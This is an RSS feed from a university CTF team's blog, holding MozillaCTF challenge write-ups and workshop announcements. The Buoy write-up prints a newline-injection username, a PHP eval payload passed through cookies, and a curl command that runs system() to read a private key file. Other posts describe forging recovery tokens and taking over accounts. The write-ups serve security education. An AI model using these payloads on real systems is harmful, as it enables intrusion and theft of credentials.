<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>squareroots</title>
	<atom:link href="http://blog.squareroots.de/en/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.squareroots.de/en</link>
	<description>Stealing your flags since 0x7d6</description>
	<lastBuildDate>Fri, 27 Jan 2012 16:32:12 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>MozillaCTF Write-Up SecureFileLock (250)</title>
		<link>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-securefilelock-250/</link>
		<comments>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-securefilelock-250/#comments</comments>
		<pubDate>Fri, 27 Jan 2012 15:10:09 +0000</pubDate>
		<dc:creator>coolbreeze</dc:creator>
				<category><![CDATA[MozillaCTF]]></category>
		<category><![CDATA[Write-Up]]></category>

		<guid isPermaLink="false">http://blog.squareroots.de/en/?p=355</guid>
		<description><![CDATA[This very secure locking mechanism encloses files and only gives them to you when you know the passphrase. Find it and you will have the flag. Ok, let&#8217;s see. It&#8217;s a 64bit ELF binary, which means no easy &#8220;Press F5 in IDA&#8221;. Let&#8217;s run it Ok, let&#8217;s see what it does in strace if we enter [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p><a href="https://mozillactf.org/files/securefilelock">This very secure locking mechanism</a> encloses files and only gives them to you when you know the passphrase. Find it and you will have the flag.</p></blockquote>
<p>Ok, let&#8217;s see. It&#8217;s a 64bit ELF binary, which means no easy &#8220;Press F5 in IDA&#8221;. Let&#8217;s run it</p>
<pre class="brush: bash; title: ; notranslate">
$:~/tmp/mozillactf$ ./securefilelock
Welcome to Secure File Lock
Playing 'Ethereal Awakening' by Project Divinity (CC BY-NC-SA 2.5)
Please enter your password. (max length = 32):
</pre>
<p>Ok, let&#8217;s see what it does in strace if we enter any password (boring stuff omitted).</p>
<pre class="brush: bash; title: ; notranslate">
$:~/tmp/mozillactf$ strace -eexecve ./securefilelock
execve(&quot;./securefilelock&quot;, [&quot;./securefilelock&quot;], [/* 37 vars */]) = 0
Welcome to Secure File Lock
Playing 'Ethereal Awakening' by Project Divinity (CC BY-NC-SA 2.5)
Please enter your password. (max length = 32):
a
Processing.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
execve(&quot;/usr/bin/vlc&quot;, [&quot;/usr/bin/vlc&quot;, &quot;--play-and-exit&quot;, &quot;/tmp/sf.KpQB3w&quot;], [/* 37 vars */]) = -1 ENOENT (No such file or directory)</pre>
<p>Ok, so it writes to a temp file and tries to run it in vlc. Let&#8217;s try the same thing for password &#8220;b&#8221;. The get another file which differs in every bytes. Oh well, this sounds like XOR. Entering &#8220;ab&#8221; as a password results in a file that matches every second byte to the corresponding files for &#8220;a&#8221; and &#8220;b&#8221; &#8211; ok, its XOR.</p>
<p>Now, let&#8217;s once again look at the output we got when the programm started.</p>
<pre class="brush: plain; title: ; notranslate">

Welcome to Secure File Lock
Playing 'Ethereal Awakening' by Project Divinity (CC BY-NC-SA 2.5)
</pre>
<p>Googling for &#8216;Ethereal Awakening&#8217; and the exact filesize, we find a torrent which lists multiple MP3 files. At this point, there are two ways to handle things. a) Download the MP3 or b) be lucky and have challenge authors that think ahead. Let&#8217;s go with b), the CTF was fun up until this point.</p>
<p>MP3? They will probably have a header! Looking at any given MP3 they all shared the same 7 bytes.</p>
<pre class="brush: plain; title: ; notranslate">49 44 33 03 00 00 00</pre>
<p>Ok, so we know the extracted file is an MP3 audio file and we know how the first 7 bytes look. Let&#8217;s hope for the condition of b) (challenge authors that think ahead) and guess that the XOR key is 7 bytes long. The idea now is to generate all possible outcomes of the file using just one byte long XOR keys.</p>
<pre class="brush: python; title: ; notranslate">

import os
for i in range(ord('a'),ord('z')+1):
 os.system(&quot;echo %s | ./securefilelock&quot; % chr(i))
 os.system(&quot;mv /tmp/sf.* /tmp/unpacked_%s&quot; % chr(i))

for i in range(ord('A'),ord('Z')+1):
 os.system(&quot;echo %s | ./securefilelock&quot; % chr(i))
 os.system(&quot;mv /tmp/sf.* /tmp/unpacked_%s&quot; % chr(i))

for i in range(ord('0'),ord('9')+1):
 os.system(&quot;echo %s | ./securefilelock&quot; % chr(i))
 os.system(&quot;mv /tmp/sf.* /tmp/unpacked_%s&quot; % chr(i))
</pre>
<p>After we have generated this, let&#8217;s look at each byte until we have found the right key.</p>
<pre class="brush: python; title: ; notranslate">

import base64
from itertools import izip, cycle
import sys
import glob

def xor_crypt_string(data, key):
 return ''.join(chr(ord(x) ^ ord(y)) for (x,y) in izip(data, cycle(key)))

orig = &quot;ID3\x03\x00\x00\x00&quot;
secret = dict()

for fn in glob.glob(&quot;/tmp/unpacked_*&quot;):
 char = fn[fn.find(&quot;_&quot;)+1:]
 cont = open(fn,&quot;r&quot;).read()
 for i in range(0,7):
 if cont[i] == orig[i]:
 secret[i] = char
sk = secret.keys()
sk.sort()
print ''.join(secret[s] for s in sk)
</pre>
<p>Which returns &#8220;yciNhAh&#8221; &#8211; 250 points.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-securefilelock-250/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MozillaCTF Write-Up Buoy (250)</title>
		<link>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-buoy-250/</link>
		<comments>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-buoy-250/#comments</comments>
		<pubDate>Fri, 27 Jan 2012 14:42:50 +0000</pubDate>
		<dc:creator>coolbreeze</dc:creator>
				<category><![CDATA[MozillaCTF]]></category>
		<category><![CDATA[Write-Up]]></category>

		<guid isPermaLink="false">http://blog.squareroots.de/en/?p=338</guid>
		<description><![CDATA[Get access to the system of the communication buoy (pwned feds, international waters) and steal the private key that is located in /home/buoy/private.key It might help you that our intelligence has found the source code. Looking at the source, we see that there should be a way to register using /?m=register &#8211; it is however disabled. So, we [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>Get access to the system of the <a href="https://challenge02.mozillactf.org/">communication buoy</a> (pwned feds, international waters) and steal the private key that is located in /home/buoy/private.key<br />
It might help you that our intelligence has found the <a href="https://mozillactf.org/files/Buoy_v0.2.zip">source code</a>.</p></blockquote>
<p>Looking at the source, we see that there should be a way to register using /?m=register &#8211; it is however disabled. So, we first need to find a way to register. There is a folder &#8220;modules&#8221; beneath the root folder, which contains register.php. We find a function, which is called with the parameters</p>
<pre class="brush: php; light: true; title: ; notranslate">$_REQUEST[&quot;username&quot;]</pre>
<p>and</p>
<pre class="brush: php; title: ; notranslate">$_REQUEST[&quot;password&quot;]</pre>
<p>. The two parameters are checked so they cannot be longer then 50 chars.</p>
<pre class="brush: php; title: ; notranslate">

function register( $username, $password )
{
 $handle = @fopen( '/tmp/users.db', 'a' );

if( !$handle )
 {
 return false;
 }

fwrite( $handle, $username . ';' . md5( $password ) . ';' . ( $auto_enable_accounts ? '1' : '0' ) . ';' . &quot;\n&quot; );
 fclose( $handle );

return true;
}
</pre>
<p>Looking at the source, we see that a user is not automatically enabled because the $auto_enable_accounts var is not set. Thus, we need some way to enable our user. We have unfiltered control of the username, so let&#8217;s just register as &#8220;sqrts;ea847988ba59727dbf4e34ee75726dc3;1;\na&#8221; with any password. This adds two lines to the database file</p>
<pre class="brush: plain; title: ; notranslate">
sqrts;ea847988ba59727dbf4e34ee75726dc3;1;
a;&lt;random md5s&gt;;0;
</pre>
<p>So, we can now log into the system as sqrts with password &#8220;topsecret&#8221; (if you wondered what the md5 was).<br />
After having logged in, we now need to find a vuln to run our attack. A promising this is &#8220;modules/read.php&#8221;. It reads and displays the message that were sent before. However, it has some form of smart tags to generate formatted output.</p>
<pre class="brush: php; title: ; notranslate">&lt;/pre&gt;
function replace_code( $message )
{
 $message = preg_replace( '/\[b\](.*?)\[\/b\]/i', '&lt;b&gt;$1&lt;/b&gt;', $message );
 $message = preg_replace( '/\[i\](.*?)\[\/i\]/i', '&lt;i&gt;$1&lt;/i&gt;', $message );
 $message = preg_replace( '/\[uc\](.*?)\[\/uc\]/ie', 'strtoupper(&quot;$1&quot;)', $message );
 $message = preg_replace( '/\[lc\](.*?)\[\/lc\]/ie', 'strtolower(&quot;$1&quot;)', $message );

return $message;
}
</pre>
<p>replace_code is called on the posted text. Looking at the third and fourth preg_replace, we see the &#8220;e&#8221; modifier. &#8220;e&#8221; stands for evaluate and means that the second parameter is run as PHP code. After playing with it a bit, we entered the following text</p>
<pre class="brush: php; title: ; notranslate">

{${$_COOKIE[cmd]($_COOKIE[param])}}
</pre>
<p>This notion is available in PHP to call functions generated from a string &#8211; and we can control $_COOKIE. Note that we could not use quotes for the name in the array because of <a href="http://www.php.net/manual/en/function.htmlspecialchars.php">htmlspecialchars()</a> being called on the message first. Afterwards, we can execute our commands using curl.</p>
<pre class="brush: bash; title: ; notranslate">

curl -b &quot;PHPSESSID=...;cmd=system;cmd=cat /home/buoy/private.key&quot; http://challenge02.mozillactf.org/index.php?read=m&amp;channel=whatwejustinserted
</pre>
<p>which gives us the flag.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-buoy-250/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MozillaCTF Write-Up Kill the Kraken (200)</title>
		<link>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-kill-the-kraken-200/</link>
		<comments>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-kill-the-kraken-200/#comments</comments>
		<pubDate>Fri, 27 Jan 2012 13:51:26 +0000</pubDate>
		<dc:creator>coolbreeze</dc:creator>
				<category><![CDATA[MozillaCTF]]></category>
		<category><![CDATA[Write-Up]]></category>

		<guid isPermaLink="false">http://blog.squareroots.de/en/?p=333</guid>
		<description><![CDATA[The description states The kraken is an evil creature that needs to be put down. So, we found that there is a user called kraken in Spark. Killing the kraken probably means deleting the account. How can we delete an account? Yes, we can generate the recovery token if we know the e-mail address. But [...]]]></description>
			<content:encoded><![CDATA[<p>The description states</p>
<blockquote><p>The kraken is an evil creature that needs to be put down.</p></blockquote>
<p>So, we found that there is a user called kraken in Spark. Killing the kraken probably means deleting the account. How can we delete an account? Yes, we can generate the recovery token if we know the e-mail address. But well, we don&#8217;t that, do we?</p>
<p>Looking at the last <a href="/en/2012/01/mozillactf-write-up-things-long-forgotten-200/">challenge</a>, we saw a URL for the user. In our case, the user was called &#8220;sqrtsben&#8221; and the link was /en-US/users/737172747362656E. We first thought that this might a be user ID of some sort stored in the database. But, looking again, we see that the ID has exactly double the length of our username. Having a idea of what the ASCII table looks like helps here &#8211; 0&#215;73 is the number for &#8220;s&#8221;, 0&#215;71 for &#8220;q&#8221; and so on. So, this is actually the username represented in hex.</p>
<p>Now that we know that, we can generate the correct user ID for the kraken, which is &#8220;6B72616B656E&#8221;. Opening the coresponding page shows us the e-mail address. The knowledge from the last challenge lets us generate the right token, so we can reset the password for the kraken and delete it. After deleting it, we get a message stating our flag.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-kill-the-kraken-200/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MozillaCTF Write-Up Things long forgotten (200)</title>
		<link>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-things-long-forgotten-200/</link>
		<comments>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-things-long-forgotten-200/#comments</comments>
		<pubDate>Fri, 27 Jan 2012 13:40:09 +0000</pubDate>
		<dc:creator>coolbreeze</dc:creator>
				<category><![CDATA[MozillaCTF]]></category>
		<category><![CDATA[Write-Up]]></category>

		<guid isPermaLink="false">http://blog.squareroots.de/en/?p=327</guid>
		<description><![CDATA[The description to the challenge was given as: Find something the developer forgot about. So, we are looking for something that was not meant to be on the website. As we know from experience, typically things aren&#8217;t removed from the HTML source but just commented out. So, let&#8217;s look at the website&#8217;s source &#8211; oh [...]]]></description>
			<content:encoded><![CDATA[<p>The description to the challenge was given as:</p>
<blockquote><p>Find something the developer forgot about.</p></blockquote>
<p>So, we are looking for something that was not meant to be on the website. As we know from experience, typically things aren&#8217;t removed from the HTML source but just commented out. So, let&#8217;s look at the website&#8217;s source &#8211; oh what have we here?</p>
<pre class="brush: xml; title: ; notranslate">&lt;!-- &lt;a href=&quot;http://ocean.mozillactf.org/en-US/users/737172747362656E&quot;&gt;Debug User&lt;/a&gt; --&gt;</pre>
<p>Let&#8217;s follow that link. It shows us a page with our user information. Ok, this is old news, we registered with that data. But maybe&#8230; oh yeah, the source!</p>
<pre class="brush: xml; title: ; notranslate">&lt;!-- Flag ='There are so many buried treasures in the sea!' --&gt;</pre>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-things-long-forgotten-200/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MozillaCTF Write-Up Underwater Camouflage (250)</title>
		<link>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-underwater-camouflage-250/</link>
		<comments>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-underwater-camouflage-250/#comments</comments>
		<pubDate>Fri, 27 Jan 2012 13:28:34 +0000</pubDate>
		<dc:creator>coolbreeze</dc:creator>
				<category><![CDATA[MozillaCTF]]></category>
		<category><![CDATA[Write-Up]]></category>

		<guid isPermaLink="false">http://blog.squareroots.de/en/?p=316</guid>
		<description><![CDATA[One of the challenges in MozillaCTF was to determine the way of how the Password Recovery Token was generated. There&#8217;s something fishy about the generation of recovery token. Find out how to generate them for other accounts! The token could be viewed directly after logging in and looking at the user details. To gather some [...]]]></description>
			<content:encoded><![CDATA[<p>One of the challenges in MozillaCTF was to determine the way of how the Password Recovery Token was generated.</p>
<blockquote><p>There&#8217;s something fishy about the generation of recovery token. Find out how to generate them for other accounts!</p></blockquote>
<p>The token could be viewed directly after logging in and looking at the user details. To gather some intelligence on the generation algorithm, we first created three accounts and looked at the difference in the tokens.</p>
<pre class="brush: plain; title: ; notranslate">
sqrts1;sqrts@mailinator.com;NR0TE0lgSiwIAhBOEhEOUk0RCgwHBAARAGAFCA0JSQcPVB8eTwoBTQAYFRwHYUo=
sqrts2;sqrts1@mailinator.com;NR0TE0kRZyAABxVJHQQVTxFcBg4ZBgMXB1NZKQkESQUHThEYDhtAQxwEFBkGVVQ=
sqrts3;sqrts2@mailinator.com;NR0TE0kSZyAABxVJHQQVTxFcBg4ZBgMXB1NaKQkESQUHThEYDhtAQxwEFBkGVVQ=
</pre>
<p>We can see that there is distinct difference between the first and second user, but only a slight one between the second and third. Looking at the generated tokens, we see that there is a difference in the 8th byte. The difference between sqrts1 and sqrts2 is very clear, between sqrts2 and sqrts3 it is just one bit. This leads us to believe that the e-mail address is used to generate the token and not the username (the usernames only differ in one resp. two bits between each the usernames.</p>
<p>We know that base64 encodes 6 bytes in base256 to 8 bytes. So, lets use the first 8 bytes of the token and the first 6 bytes of the e-mail address. Looking at the result, they differ &#8211; maybe it&#8217;s XOR encryption?</p>
<p>Lets do an XOR on the results</p>
<pre class="brush: python; title: ; notranslate">print xor_crypt_string(base64.b64decode(&quot;NR0TE0kS&quot;), &quot;sqrts2&quot;)</pre>
<p>This gives us</p>
<pre class="brush: plain; title: ; notranslate">Flag: </pre>
<p>Ok, looks like we are on the right way. However, we entered an e-mail address that only has 21 chars, but the base64 decoded token has 47 chars. So, lets use a very long e-mail address! We signed up again with the e-mail address</p>
<pre class="brush: plain; title: ; notranslate">wearelookingforreallylongxorkeysinthischallenge@mailinator.com</pre>
<p>which gave us the token</p>
<pre class="brush: plain; title: ; notranslate">MQkAFV9MSCIKBxdHFQoTUgYTCQ0NGR0LFFgHGw8AWRoHTgQECBoNSBIFCw0aRkI=</pre>
<p>Taking the first 47 chars from the email address and the base64 decoded token and XORing them gives us:</p>
<pre class="brush: plain; title: ; notranslate">Flag: 'Many sea creatures hide in plain sight!'</pre>
<p>Afterwards, looking at the other strings, we determined that the token was just the e-mail address concatted and then cut to 47 chars. However, the method was changed slightly later, so that the e-mail address was seperated by | as a delimiter (so email-address|email-address|&#8230;).</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.squareroots.de/en/2012/01/mozillactf-write-up-underwater-camouflage-250/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Workshops Spring Term 2011 &#8211; update</title>
		<link>http://blog.squareroots.de/en/2011/03/workshops-spring-term-2011-update/</link>
		<comments>http://blog.squareroots.de/en/2011/03/workshops-spring-term-2011-update/#comments</comments>
		<pubDate>Tue, 08 Mar 2011 15:24:57 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[Gerneral]]></category>
		<category><![CDATA[Invitation]]></category>
		<category><![CDATA[Workshops]]></category>

		<guid isPermaLink="false">http://blog.squareroots.de/en/?p=312</guid>
		<description><![CDATA[We recognised a small mistake in our lower contribution and, partly, in e-mails. Due to scheduling conflicts, the first workshop will not take place on Thursday but instead on: Wednesday, 03/09/2011 The remaining information is still valid. In general, as in recent years: We will give a short introduction which is immediately followed by exercises. [...]]]></description>
			<content:encoded><![CDATA[<p>We recognised a small mistake in our lower contribution and, partly, in e-mails. Due to scheduling conflicts, the first workshop will not take place on Thursday but instead on:<br />
<strong>Wednesday, 03/09/2011</strong><br />
The remaining information is still valid.</p>
<p>In general, as in recent years: We will give a short introduction which is immediately followed by exercises. Our talks will be very short and, as always, the focus is on practical tasks. So it is possible to participate from home without but attendance at the first workshop is highly recommended, since a lot of organisational questions will be discussed.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.squareroots.de/en/2011/03/workshops-spring-term-2011-update/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Troopers 2011 &amp; PacketWars™</title>
		<link>http://blog.squareroots.de/en/2011/03/troopers-2011-packetwars%e2%84%a2/</link>
		<comments>http://blog.squareroots.de/en/2011/03/troopers-2011-packetwars%e2%84%a2/#comments</comments>
		<pubDate>Mon, 07 Mar 2011 13:11:57 +0000</pubDate>
		<dc:creator>uchimata</dc:creator>
				<category><![CDATA[Gerneral]]></category>

		<guid isPermaLink="false">http://blog.squareroots.de/en/?p=296</guid>
		<description><![CDATA[Since we scored second during last year&#8217;s PacketWars™ challenge on Troopers, we are invited to compete again. Troopers is an IT-security conference which is hosted every year by the company ERNW GmbH at PMA in Heidelberg. During this conference, a so called PacketWars takes place. This kind of IT-security contests is fundamentally different from CTF contests which [...]]]></description>
			<content:encoded><![CDATA[<p>Since we scored second during <a href="http://www.troopers10.de/content/">last year&#8217;s</a> PacketWars™ challenge on <a href="http://www.troopers.de">Troopers</a>, we are invited to compete again.</p>
<p><em>Troopers</em> is an IT-security conference which is hosted every year by the company <a href="http://www.ernw.de">ERNW GmbH</a> at <a href="http://www.print-media-academy.com/">PMA</a> in Heidelberg. During this conference, a so called <a href="http://www.youtube.com/watch?v=KybtRr7sWG8">PacketWars</a> takes place. This kind of IT-security contests is fundamentally different from CTF contests which we are used to participate. The complete contest is subdivided into multiple so called battles. The single battles usually comprise black box analyses of systems which could also be found in the Internet or during <a href="http://www.ernw.de/content/e4/e210/index_ger.html">penetration tests</a>. Therefore we will spend quiet some time for prepartion to even improve our good second place from <a href="http://www.youtube.com/watch?v=G4mApRe4kPA">last year</a>. The major goal during the competition is of course the defacement of <a href="http://www.troopers.de/troopers11/agenda/packetwars-at-troopers/">this site</a> <img src='http://blog.squareroots.de/en/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>&nbsp;</p>
<p>See you there, troopers!</p>
<p>&nbsp;</p>
<p><a href="http://www.troopers.de"><img class="aligncenter size-full wp-image-301" title="TR11_Speaker_Badge02" src="http://blog.squareroots.de/en/wp-content/uploads/2011/03/TR11_Speaker_Badge02.gif" alt="" width="465" height="225" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.squareroots.de/en/2011/03/troopers-2011-packetwars%e2%84%a2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Workshops Spring Term 2011</title>
		<link>http://blog.squareroots.de/en/2011/02/workshops-spring-term-2011/</link>
		<comments>http://blog.squareroots.de/en/2011/02/workshops-spring-term-2011/#comments</comments>
		<pubDate>Mon, 14 Feb 2011 07:57:15 +0000</pubDate>
		<dc:creator>flo</dc:creator>
				<category><![CDATA[Gerneral]]></category>
		<category><![CDATA[Invitation]]></category>
		<category><![CDATA[Workshops]]></category>

		<guid isPermaLink="false">http://blog.squareroots.de/en/?p=293</guid>
		<description><![CDATA[As every spring term, the squareroots are organizing a series of security related workshops. These workshops deal with all kind of IT security related topics like crypto, network security and webhacking. Since we want to encourage all students of the University of Mannheim to participate, no prior &#8220;hacking knowledge&#8221; is necessary. Everyone who is interested [...]]]></description>
			<content:encoded><![CDATA[<p>As every spring term, the squareroots are organizing a series of security related workshops. These workshops deal with all kind of IT security related topics like crypto, network security and webhacking. Since we want to encourage all students of the <a href="http://www.uni-mannheim.de">University of Mannheim</a> to participate, no prior <em>&#8220;hacking knowledge&#8221;</em> is necessary.<br />
Everyone who is interested &#8212; not restricted to students in any sense &#8212; in getting a introduction to IT security and hacking techniques is welcome to participate in the first workshop on <strong>wednesday march 9th, 17.15, <a href="http://pipool.informatik.uni-mannheim.de/">Pi-Pool</a></strong>. During this first session, we will present the covered topics, some organizational stuff and doing a first pratical, basic hacking session. All slides and stuff will be made available to the participants. A summary will also be published in this blog.<br />
If you have any further questions, feel free to contact us. Looking forward to see you there <img src='http://blog.squareroots.de/en/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.squareroots.de/en/2011/02/workshops-spring-term-2011/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Details on workshops</title>
		<link>http://blog.squareroots.de/en/2010/03/details-on-workshops/</link>
		<comments>http://blog.squareroots.de/en/2010/03/details-on-workshops/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 11:30:43 +0000</pubDate>
		<dc:creator>uchimata</dc:creator>
				<category><![CDATA[Gerneral]]></category>

		<guid isPermaLink="false">http://blog.squareroots.de/en/?p=287</guid>
		<description><![CDATA[As we already announced, we&#8217;re organizing a set of workshops during the spring term 2010. This post summarizes the first workshop that was held last week and gave further organizational details. About 40 people participated while we presented &#8212; among other things &#8212; the order of the topics: JavaScript (10.3.) SQL Injection I (17.3.) SQL [...]]]></description>
			<content:encoded><![CDATA[<p>As we already <a href="http://blog.squareroots.de/en/2010/02/workshops-spring-term-2010/">announced</a>, we&#8217;re organizing a set of workshops during the spring term 2010. This post summarizes the first workshop that was held last week and gave further organizational details. About 40 people participated while we presented &#8212; among other things &#8212; the order of the topics:</p>
<ul>
<li>JavaScript (10.3.)</li>
<li>SQL Injection I (17.3.)</li>
<li>SQL Injection II (24.3.)</li>
<li>File Inclusion/Code Execution (14.4.)</li>
<li>Regex (21.4.)</li>
<li>Scripting Languages &amp; Automation (28.4.)</li>
<li>Network Security (5.5.)</li>
<li>Review of old CTF services</li>
</ul>
<p>And of course, there will be the infamous final CTF contest for the best attendees who survived the workshops <img src='http://blog.squareroots.de/en/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' />  To attend the workshops, the most important thing is to subscribe to the <a href="https://blog.squareroots.de/cgi-bin/mailman/listinfo/workshop">workshop mailing list</a>. If you did not participate in the first workshop: Feel free to be chatty on the workshop mailinglist, the list is intended to be your communication platform for workshop related problems and questions. Additionally, don&#8217;t get frustrated to quickly. The challanges are design to, well, challenge your endurance and will to find out the hidden secrets even if it gets uncomfortable <img src='http://blog.squareroots.de/en/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' />  All slides and stuff will be made available on the workshops server &#8212; get access to it subscribing to the <a href="https://blog.squareroots.de/cgi-bin/mailman/listinfo/workshop">workshop mailing list</a> <img src='http://blog.squareroots.de/en/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.squareroots.de/en/2010/03/details-on-workshops/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Workshops Spring Term 2010</title>
		<link>http://blog.squareroots.de/en/2010/02/workshops-spring-term-2010/</link>
		<comments>http://blog.squareroots.de/en/2010/02/workshops-spring-term-2010/#comments</comments>
		<pubDate>Sun, 28 Feb 2010 13:56:04 +0000</pubDate>
		<dc:creator>uchimata</dc:creator>
				<category><![CDATA[Workshops]]></category>

		<guid isPermaLink="false">http://blog.squareroots.de/en/?p=281</guid>
		<description><![CDATA[As every spring term, the squareroots are organizing a series of security related workshops. These workshops deal with all kind of IT security related topics like crypto, network security and webhacking. Since we want to encourage all students of the University of Mannheim to participate, no prior &#8220;hacking knowledge&#8221; is necessary. Everyone who is interested [...]]]></description>
			<content:encoded><![CDATA[<p>As every spring term, the squareroots are organizing a series of security related workshops. These workshops deal with all kind of IT security related topics like crypto, network security and webhacking. Since we want to encourage all students of the <a href="http://www.uni-mannheim.de">University of Mannheim</a> to participate, no prior <em>&#8220;hacking knowledge&#8221;</em> is necessary.<br />
Everyone who is interested &#8212; not restricted to students in any sense &#8212; in getting a substantiated introduction to IT security and hacking techniques is welcome to participate in the first workshop on <strong>march 3rd, 17.15</strong>, <a href="http://pipool.informatik.uni-mannheim.de/">Pi-Pool</a>. During this first session, we will present the covered topics, some organizational stuff and doing a first pratical, basic hacking session. All slides and stuff will be made available to the participants. A summary will also be published in this blog.<br />
If you have any further questions, feel free to contact us. Looking forward to see you there <img src='http://blog.squareroots.de/en/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://blog.squareroots.de/en/2010/02/workshops-spring-term-2010/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

